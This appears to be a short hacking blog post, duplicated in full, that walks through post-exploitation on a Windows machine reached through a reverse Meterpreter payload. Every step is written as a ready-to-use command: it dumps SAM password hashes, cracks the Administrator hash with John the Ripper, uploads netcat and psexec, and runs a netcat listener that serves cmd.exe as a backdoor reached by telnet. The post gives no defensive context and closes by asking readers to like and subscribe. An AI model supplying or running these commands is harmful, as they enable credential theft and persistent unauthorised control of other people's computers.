Steps:
------
(after connecting to remote computer with Payload of win32_reverse_meterpreter)
1) Load File system library, SAM library, and Process library
ex. use -m Fs use -m Sam use -m Process
2) Get the window's password hash file
ex. gethashes
(gethashes is part of the SAM library)
3) Crack the Admin's hash with John the ripper
ex. john /tmp/dump-01.txt
4) Upload Netcat, Psexec, and whoami. Netcat is a useful program to up a backdoor on a computer. Psexec can select what user to run a program under. Whoami just tells you what user you are logged in as.
ex. upload /tmp/nc.exe c: upload /tmp/psexec.exe c: upload /tmp/whoami.exe c:
5) Run a Netcat server under the Admin's account!
ex. psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969
6) Telnet into the Netcat server and you now have admin access!!!
ex. Telnet 192.168.0.6 6969
Enjoy please like subscribe and follow
------
(after connecting to remote computer with Payload of win32_reverse_meterpreter)
1) Load File system library, SAM library, and Process library
ex. use -m Fs use -m Sam use -m Process
2) Get the window's password hash file
ex. gethashes(gethashes is part of the SAM library)
3) Crack the Admin's hash with John the ripper
ex. john /tmp/dump-01.txt
4) Upload Netcat, Psexec, and whoami. Netcat is a useful program to up a backdoor on a computer. Psexec can select what user to run a program under. Whoami just tells you what user you are logged in as.
ex. upload /tmp/nc.exe c: upload /tmp/psexec.exe c: upload /tmp/whoami.exe c:
5) Run a Netcat server under the Admin's account!
ex. psexec.exe \\127.0.0.1 -u Administrator -p hacker c:\nc.exe -L -d -e cmd.exe -p 6969
6) Telnet into the Netcat server and you now have admin access!!!
ex. Telnet 192.168.0.6 6969
Enjoy please like subscribe and follow
No comments:
Post a Comment